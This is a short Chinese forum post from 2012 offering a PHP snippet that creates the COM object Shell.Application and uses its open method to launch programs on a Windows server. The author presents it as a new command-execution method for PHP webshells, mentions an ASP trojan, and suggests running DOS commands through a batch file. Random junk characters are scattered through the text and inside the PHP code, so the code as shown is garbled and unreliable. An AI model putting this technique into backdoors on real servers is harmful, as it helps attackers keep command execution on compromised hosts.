关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。* A4 q$ ^: @% A3 o6 F
5 ~# s' w, H- y) N% h( M0 J
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法+ i: N! D3 ~7 T7 D6 Y
% N% B8 c) B( `3 A ?; {/ z# K<?php1 b& i# O; h8 K' T) o* X) ^& u u
$wsh = new COM('Shell.Application') or die("Shell.Application"); u/ u) t7 o9 E: y# X, i, P O
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
1 i% G9 d, y- ~* C/ @6 y. N //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。+ R ? r) H, [/ }7 H2 r
?>
5 B4 a0 f, Z6 Y2 H4 n0 F# B2 D4 A( i( o1 y, W4 s8 a$ O% k
xp+APMServ5.2.0测试通过。
$ a5 G D) }6 L |
发表于 2012-9-15 14:29:01
收藏
支持
反对